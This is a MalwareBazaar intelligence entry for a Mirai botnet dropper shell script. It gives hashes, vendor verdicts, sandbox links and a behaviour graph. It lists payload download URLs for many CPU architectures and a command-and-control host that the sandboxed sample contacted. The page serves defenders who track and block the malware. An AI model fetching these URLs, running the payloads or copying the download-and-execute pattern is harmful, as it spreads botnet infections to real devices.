MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 cb894059764a25d53785b0745191805a775872b11ce1a5ee24b9d5688c26a969. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry


Mirai


Vendor detections: 7


Intelligence 7 IOCs YARA File information Comments
Download sample Add tag Delete this sample Report a False Positive

SHA256 hash: cb894059764a25d53785b0745191805a775872b11ce1a5ee24b9d5688c26a969
SHA3-384 hash: d15fe1a5dba8796c9ac3b8c83d9c313a0c7e9f852e3639ea8e07984b0ad54e4862c4679cae721e57e7530ceb1b29288d
SHA1 hash: c49fe9f4ea1ba7d1c3737484c262618d7d662c42
MD5 hash: 67051d4de174c6d5df4d17d0517c2df6
humanhash: nebraska-juliet-harry-florida
File name:busybox.sh
Download: download sample
Signature Mirai
Create hunting rule
File size:1'078 bytes
First seen:2025-06-30 16:59:35 UTC
Last seen:Never
File type: sh
MIME type:text/plain
ssdeep 24:9IjdISdIRGNIN/dInKndIRdIEdIGQdI3ZdIaldIXdI61U:GjmSm/mnsmRmEmGQm3ZmalmXm61U
TLSH T1E21160EB005EB4408C2D9D61B0396C59B5848BF03594DB89F48ED4B6F2A9E3B6336F49
Magika txt
Reporter abuse_ch
Tags:sh
URLMalware sample (SHA256 hash)SignatureTags
http://bulon.trumdvfb.com/skibidi/cutearm1bc137841445a32184b981463f26cf92cd5faee96c6530b71788322f6e02b74c Miraielf mirai opendir ua-wget
http://bulon.trumdvfb.com/skibidi/cutearm531bd74459680c387a1eb10667a44b7691101778b2eee79dd9e33c27cf18af7eb Miraielf mirai opendir ua-wget
http://bulon.trumdvfb.com/skibidi/cutearm6e7ed00ebd7a3124bf74c3a1e5de27d55daeba1a6c6dd9b507a5c4435eb87e78c Miraielf mirai opendir ua-wget
http://bulon.trumdvfb.com/skibidi/cutearm7b2510b90cc924b8bde71cb86f3875a466de3a4dff19efa2cc4d93173f38a3381 Miraielf mirai opendir ua-wget
http://bulon.trumdvfb.com/skibidi/cutem68kfc1848906eb6cf539a5009dfa5cbd87b822287242ceb9e04e7bd6f747a1f0a6e Miraielf mirai opendir ua-wget
http://bulon.trumdvfb.com/skibidi/cutemips994d3872166fd7b39d2c05628c86417140f456637e811f9235792c5b667947dd Miraielf mirai opendir ua-wget
http://bulon.trumdvfb.com/skibidi/cutempsle389a22f9b3afb0c931166ee35ed4668519b21fb82040c5def34e6da01918b43 Miraielf mirai opendir ua-wget
http://bulon.trumdvfb.com/skibidi/cutepowerpcn/an/aelf opendir ua-wget
http://bulon.trumdvfb.com/skibidi/cutesh4245daaf02866c349c32028beeaec0c428a85ad4a0fe3df40449ad0cdd2942db6 Miraielf mirai opendir ua-wget
http://bulon.trumdvfb.com/skibidi/cutex8672f6704fdb711d1ba20c96a7ef73e7ac2cd41943cc4bdd417cab03417be1eb55 Miraielf mirai opendir ua-wget
http://bulon.trumdvfb.com/skibidi/cutex86_64a6880d908d5fa479ce234db7beed1598d5c8e9304696d3af7dc8cfee07a55e7e Miraielf mirai opendir ua-wget

Intelligence

File Origin
# of uploads :
1
# of downloads :
84
Origin country :
DE DE
Vendor Threat Intelligence
Detection(s):
Sanesecurity.Malware.32158.LX.BOT.UNOFFICIAL
Create hunting rule

SecuriteInfo.com.Linux.Downloader-32.UNOFFICIAL
Create hunting rule

Verdict:
Clean
Score:
99.9%
Link:
https://cyber-fortress.com/docs/result/index.php?id=6862c2a337c343677947e089linux22vpnfull_triage
Tags:
n/a
Verdict:
Malicious
Threat level:
  10/10
Confidence:
100%
Link:
https://www.filescan.io/uploads/6862c2ad7423ff017c377369/reports/ac36713f-9858-40af-b57d-8ed226ed5f06/overview
Status:
terminated
Link:
https://sandbox.kunai.rocks/analysis/d4fdb4ca-4380-4184-90a5-fb368ff2a84d
Behavior Graph:
Download SVG
%3 guuid=2835efb5-1700-0000-13de-0f224a0c0000 pid=3146 /usr/bin/sudo guuid=eaa7d3b7-1700-0000-13de-0f224f0c0000 pid=3151 /tmp/sample.bin guuid=2835efb5-1700-0000-13de-0f224a0c0000 pid=3146->guuid=eaa7d3b7-1700-0000-13de-0f224f0c0000 pid=3151 execve guuid=1d2915b8-1700-0000-13de-0f22500c0000 pid=3152 /usr/bin/busybox dns net send-data write-file guuid=eaa7d3b7-1700-0000-13de-0f224f0c0000 pid=3151->guuid=1d2915b8-1700-0000-13de-0f22500c0000 pid=3152 execve guuid=1b470dff-1700-0000-13de-0f22930c0000 pid=3219 /usr/bin/chmod guuid=eaa7d3b7-1700-0000-13de-0f224f0c0000 pid=3151->guuid=1b470dff-1700-0000-13de-0f22930c0000 pid=3219 execve guuid=59e377ff-1700-0000-13de-0f22950c0000 pid=3221 /usr/bin/dash guuid=eaa7d3b7-1700-0000-13de-0f224f0c0000 pid=3151->guuid=59e377ff-1700-0000-13de-0f22950c0000 pid=3221 clone guuid=7fd6c700-1800-0000-13de-0f229a0c0000 pid=3226 /usr/bin/busybox dns net send-data write-file guuid=eaa7d3b7-1700-0000-13de-0f224f0c0000 pid=3151->guuid=7fd6c700-1800-0000-13de-0f229a0c0000 pid=3226 execve guuid=44cf2047-1800-0000-13de-0f22f70c0000 pid=3319 /usr/bin/chmod guuid=eaa7d3b7-1700-0000-13de-0f224f0c0000 pid=3151->guuid=44cf2047-1800-0000-13de-0f22f70c0000 pid=3319 execve guuid=47a38647-1800-0000-13de-0f22f80c0000 pid=3320 /usr/bin/dash guuid=eaa7d3b7-1700-0000-13de-0f224f0c0000 pid=3151->guuid=47a38647-1800-0000-13de-0f22f80c0000 pid=3320 clone guuid=e8316b48-1800-0000-13de-0f22fa0c0000 pid=3322 /usr/bin/busybox dns net send-data write-file guuid=eaa7d3b7-1700-0000-13de-0f224f0c0000 pid=3151->guuid=e8316b48-1800-0000-13de-0f22fa0c0000 pid=3322 execve guuid=b5260593-1800-0000-13de-0f22720d0000 pid=3442 /usr/bin/chmod guuid=eaa7d3b7-1700-0000-13de-0f224f0c0000 pid=3151->guuid=b5260593-1800-0000-13de-0f22720d0000 pid=3442 execve guuid=74797d93-1800-0000-13de-0f22740d0000 pid=3444 /usr/bin/dash guuid=eaa7d3b7-1700-0000-13de-0f224f0c0000 pid=3151->guuid=74797d93-1800-0000-13de-0f22740d0000 pid=3444 clone guuid=54bc6594-1800-0000-13de-0f22780d0000 pid=3448 /usr/bin/busybox dns net send-data write-file guuid=eaa7d3b7-1700-0000-13de-0f224f0c0000 pid=3151->guuid=54bc6594-1800-0000-13de-0f22780d0000 pid=3448 execve guuid=f8b02ada-1800-0000-13de-0f22e40d0000 pid=3556 /usr/bin/chmod guuid=eaa7d3b7-1700-0000-13de-0f224f0c0000 pid=3151->guuid=f8b02ada-1800-0000-13de-0f22e40d0000 pid=3556 execve guuid=8490b3da-1800-0000-13de-0f22e90d0000 pid=3561 /usr/bin/dash guuid=eaa7d3b7-1700-0000-13de-0f224f0c0000 pid=3151->guuid=8490b3da-1800-0000-13de-0f22e90d0000 pid=3561 clone guuid=bc2990db-1800-0000-13de-0f22ec0d0000 pid=3564 /usr/bin/busybox dns net send-data write-file guuid=eaa7d3b7-1700-0000-13de-0f224f0c0000 pid=3151->guuid=bc2990db-1800-0000-13de-0f22ec0d0000 pid=3564 execve guuid=17ef6322-1900-0000-13de-0f22540e0000 pid=3668 /usr/bin/chmod guuid=eaa7d3b7-1700-0000-13de-0f224f0c0000 pid=3151->guuid=17ef6322-1900-0000-13de-0f22540e0000 pid=3668 execve guuid=1ed9f722-1900-0000-13de-0f22580e0000 pid=3672 /usr/bin/dash guuid=eaa7d3b7-1700-0000-13de-0f224f0c0000 pid=3151->guuid=1ed9f722-1900-0000-13de-0f22580e0000 pid=3672 clone guuid=5c208924-1900-0000-13de-0f225c0e0000 pid=3676 /usr/bin/busybox dns net send-data write-file guuid=eaa7d3b7-1700-0000-13de-0f224f0c0000 pid=3151->guuid=5c208924-1900-0000-13de-0f225c0e0000 pid=3676 execve guuid=91c4797a-1900-0000-13de-0f22150f0000 pid=3861 /usr/bin/chmod guuid=eaa7d3b7-1700-0000-13de-0f224f0c0000 pid=3151->guuid=91c4797a-1900-0000-13de-0f22150f0000 pid=3861 execve guuid=e72fdc7a-1900-0000-13de-0f22180f0000 pid=3864 /usr/bin/dash guuid=eaa7d3b7-1700-0000-13de-0f224f0c0000 pid=3151->guuid=e72fdc7a-1900-0000-13de-0f22180f0000 pid=3864 clone guuid=dce3997c-1900-0000-13de-0f221e0f0000 pid=3870 /usr/bin/busybox dns net send-data write-file guuid=eaa7d3b7-1700-0000-13de-0f224f0c0000 pid=3151->guuid=dce3997c-1900-0000-13de-0f221e0f0000 pid=3870 execve guuid=9f8f52c3-1900-0000-13de-0f22c40f0000 pid=4036 /usr/bin/chmod guuid=eaa7d3b7-1700-0000-13de-0f224f0c0000 pid=3151->guuid=9f8f52c3-1900-0000-13de-0f22c40f0000 pid=4036 execve guuid=3f8cc7c3-1900-0000-13de-0f22c50f0000 pid=4037 /usr/bin/dash guuid=eaa7d3b7-1700-0000-13de-0f224f0c0000 pid=3151->guuid=3f8cc7c3-1900-0000-13de-0f22c50f0000 pid=4037 clone guuid=38ed41c5-1900-0000-13de-0f22cc0f0000 pid=4044 /usr/bin/busybox dns net send-data guuid=eaa7d3b7-1700-0000-13de-0f224f0c0000 pid=3151->guuid=38ed41c5-1900-0000-13de-0f22cc0f0000 pid=4044 execve guuid=f7eb8fe2-1900-0000-13de-0f220c100000 pid=4108 /usr/bin/chmod guuid=eaa7d3b7-1700-0000-13de-0f224f0c0000 pid=3151->guuid=f7eb8fe2-1900-0000-13de-0f220c100000 pid=4108 execve guuid=018259e3-1900-0000-13de-0f220f100000 pid=4111 /usr/bin/dash guuid=eaa7d3b7-1700-0000-13de-0f224f0c0000 pid=3151->guuid=018259e3-1900-0000-13de-0f220f100000 pid=4111 clone guuid=ce7769e3-1900-0000-13de-0f2211100000 pid=4113 /usr/bin/busybox dns net send-data write-file guuid=eaa7d3b7-1700-0000-13de-0f224f0c0000 pid=3151->guuid=ce7769e3-1900-0000-13de-0f2211100000 pid=4113 execve guuid=fa454d2a-1a00-0000-13de-0f22a9100000 pid=4265 /usr/bin/chmod guuid=eaa7d3b7-1700-0000-13de-0f224f0c0000 pid=3151->guuid=fa454d2a-1a00-0000-13de-0f22a9100000 pid=4265 execve guuid=742a912a-1a00-0000-13de-0f22ad100000 pid=4269 /usr/bin/dash guuid=eaa7d3b7-1700-0000-13de-0f224f0c0000 pid=3151->guuid=742a912a-1a00-0000-13de-0f22ad100000 pid=4269 clone guuid=edcefa2b-1a00-0000-13de-0f22b3100000 pid=4275 /usr/bin/busybox dns net send-data write-file guuid=eaa7d3b7-1700-0000-13de-0f224f0c0000 pid=3151->guuid=edcefa2b-1a00-0000-13de-0f22b3100000 pid=4275 execve guuid=f6c17664-1a00-0000-13de-0f224e110000 pid=4430 /usr/bin/chmod guuid=eaa7d3b7-1700-0000-13de-0f224f0c0000 pid=3151->guuid=f6c17664-1a00-0000-13de-0f224e110000 pid=4430 execve guuid=76d7ed64-1a00-0000-13de-0f224f110000 pid=4431 /home/sandbox/cutex86 delete-file net guuid=eaa7d3b7-1700-0000-13de-0f224f0c0000 pid=3151->guuid=76d7ed64-1a00-0000-13de-0f224f110000 pid=4431 execve guuid=ba977565-1a00-0000-13de-0f2254110000 pid=4436 /usr/bin/busybox dns net send-data guuid=eaa7d3b7-1700-0000-13de-0f224f0c0000 pid=3151->guuid=ba977565-1a00-0000-13de-0f2254110000 pid=4436 execve guuid=be78bf68-1a00-0000-13de-0f225b110000 pid=4443 /usr/bin/chmod guuid=eaa7d3b7-1700-0000-13de-0f224f0c0000 pid=3151->guuid=be78bf68-1a00-0000-13de-0f225b110000 pid=4443 execve guuid=06229869-1a00-0000-13de-0f225e110000 pid=4446 /usr/bin/dash guuid=eaa7d3b7-1700-0000-13de-0f224f0c0000 pid=3151->guuid=06229869-1a00-0000-13de-0f225e110000 pid=4446 clone guuid=10d09f69-1a00-0000-13de-0f2261110000 pid=4449 /usr/bin/rm delete-file guuid=eaa7d3b7-1700-0000-13de-0f224f0c0000 pid=3151->guuid=10d09f69-1a00-0000-13de-0f2261110000 pid=4449 execve 4f6baed0-9587-596c-82b3-fd721afe4cc1 10.0.2.3:53 guuid=1d2915b8-1700-0000-13de-0f22500c0000 pid=3152->4f6baed0-9587-596c-82b3-fd721afe4cc1 send: 72B 335e45e1-900c-525d-a121-427d12ffb8e9 bulon.trumdvfb.com:80 guuid=1d2915b8-1700-0000-13de-0f22500c0000 pid=3152->335e45e1-900c-525d-a121-427d12ffb8e9 send: 96B guuid=7fd6c700-1800-0000-13de-0f229a0c0000 pid=3226->4f6baed0-9587-596c-82b3-fd721afe4cc1 send: 72B guuid=7fd6c700-1800-0000-13de-0f229a0c0000 pid=3226->335e45e1-900c-525d-a121-427d12ffb8e9 send: 97B guuid=e8316b48-1800-0000-13de-0f22fa0c0000 pid=3322->4f6baed0-9587-596c-82b3-fd721afe4cc1 send: 72B guuid=e8316b48-1800-0000-13de-0f22fa0c0000 pid=3322->335e45e1-900c-525d-a121-427d12ffb8e9 send: 97B guuid=54bc6594-1800-0000-13de-0f22780d0000 pid=3448->4f6baed0-9587-596c-82b3-fd721afe4cc1 send: 72B guuid=54bc6594-1800-0000-13de-0f22780d0000 pid=3448->335e45e1-900c-525d-a121-427d12ffb8e9 send: 97B guuid=bc2990db-1800-0000-13de-0f22ec0d0000 pid=3564->4f6baed0-9587-596c-82b3-fd721afe4cc1 send: 72B guuid=bc2990db-1800-0000-13de-0f22ec0d0000 pid=3564->335e45e1-900c-525d-a121-427d12ffb8e9 send: 97B guuid=5c208924-1900-0000-13de-0f225c0e0000 pid=3676->4f6baed0-9587-596c-82b3-fd721afe4cc1 send: 72B guuid=5c208924-1900-0000-13de-0f225c0e0000 pid=3676->335e45e1-900c-525d-a121-427d12ffb8e9 send: 97B guuid=dce3997c-1900-0000-13de-0f221e0f0000 pid=3870->4f6baed0-9587-596c-82b3-fd721afe4cc1 send: 72B guuid=dce3997c-1900-0000-13de-0f221e0f0000 pid=3870->335e45e1-900c-525d-a121-427d12ffb8e9 send: 97B guuid=38ed41c5-1900-0000-13de-0f22cc0f0000 pid=4044->4f6baed0-9587-596c-82b3-fd721afe4cc1 send: 72B guuid=38ed41c5-1900-0000-13de-0f22cc0f0000 pid=4044->335e45e1-900c-525d-a121-427d12ffb8e9 send: 100B guuid=ce7769e3-1900-0000-13de-0f2211100000 pid=4113->4f6baed0-9587-596c-82b3-fd721afe4cc1 send: 72B guuid=ce7769e3-1900-0000-13de-0f2211100000 pid=4113->335e45e1-900c-525d-a121-427d12ffb8e9 send: 96B guuid=edcefa2b-1a00-0000-13de-0f22b3100000 pid=4275->4f6baed0-9587-596c-82b3-fd721afe4cc1 send: 72B guuid=edcefa2b-1a00-0000-13de-0f22b3100000 pid=4275->335e45e1-900c-525d-a121-427d12ffb8e9 send: 96B 8b0a01dc-0728-52c1-8024-c4ba7801b8d6 8.8.8.8:53 guuid=76d7ed64-1a00-0000-13de-0f224f110000 pid=4431->8b0a01dc-0728-52c1-8024-c4ba7801b8d6 con guuid=27f86965-1a00-0000-13de-0f2252110000 pid=4434 /home/sandbox/cutex86 dns net send-data zombie guuid=76d7ed64-1a00-0000-13de-0f224f110000 pid=4431->guuid=27f86965-1a00-0000-13de-0f2252110000 pid=4434 clone guuid=27f86965-1a00-0000-13de-0f2252110000 pid=4434->8b0a01dc-0728-52c1-8024-c4ba7801b8d6 send: 36B 0a699bed-772b-59ad-b3ba-bbc13ad240d0 bulon.trumdvfb.com:47925 guuid=27f86965-1a00-0000-13de-0f2252110000 pid=4434->0a699bed-772b-59ad-b3ba-bbc13ad240d0 send: 14B guuid=6ec18365-1a00-0000-13de-0f2255110000 pid=4437 /home/sandbox/cutex86 guuid=27f86965-1a00-0000-13de-0f2252110000 pid=4434->guuid=6ec18365-1a00-0000-13de-0f2255110000 pid=4437 clone guuid=ba977565-1a00-0000-13de-0f2254110000 pid=4436->4f6baed0-9587-596c-82b3-fd721afe4cc1 send: 72B guuid=ba977565-1a00-0000-13de-0f2254110000 pid=4436->335e45e1-900c-525d-a121-427d12ffb8e9 con
Score:
99%
Verdict:
Malware
File Type:
SCRIPT
Link:
https://malprob.io/report/cb894059764a25d53785b0745191805a775872b11ce1a5ee24b9d5688c26a969
Detection:
n/a
Link:
https://mwdb.cert.pl/sample/cb894059764a25d53785b0745191805a775872b11ce1a5ee24b9d5688c26a969/
Verdict:
Malicious
Link:
https://tip.neiki.dev/file/cb894059764a25d53785b0745191805a775872b11ce1a5ee24b9d5688c26a969
Threat name:
Document-HTML.Downloader.Heuristic
Create hunting rule
Status:
Malicious
First seen:
2025-06-30 17:00:09 UTC
File Type:
Text (Shell)
AV detection:
7 of 24 (29.17%)
Threat level:
  2/5
Detection(s):
Suspicious file
Link:
https://check.spamhaus.org/check/?searchterm=zoeuawlwjis5kn4fwb2fdemalj3vq4vrdtq2l3rexhkwrdbgvfuq._file
Result
Malware family:
n/a
Score:
  3/10
Tags:
n/a
Link:
https://tria.ge/reports/250630-vh4jbahp2v/
Behaviour
Modifies registry class
Suspicious use of SetWindowsHookEx
Enumerates physical storage devices
Please note that we are no longer able to provide a coverage score for Virus Total.
Threat name:
Malicious File
Score:
1.00
Link:
https://yomi.yoroi.company/submissions/cb894059764a25d53785b0745191805a775872b11ce1a5ee24b9d5688c26a969

File information

The table below shows additional information about this malware sample such as delivery method and external references.

Web download

Mirai

sh cb894059764a25d53785b0745191805a775872b11ce1a5ee24b9d5688c26a969

(this sample)

Mirai

elf 1bc137841445a32184b981463f26cf92cd5faee96c6530b71788322f6e02b74c

  
URLhaus
https://urlhaus.abuse.ch/url/3562359/
  
Delivery method
Distributed via web download
  
Dropping
MD5 42278aa3a2e73a1034ad0ece2ac21b5b
  
Dropping
SHA256 1bc137841445a32184b981463f26cf92cd5faee96c6530b71788322f6e02b74c
  
URLhaus
https://urlhaus.abuse.ch/url/3572534/

Comments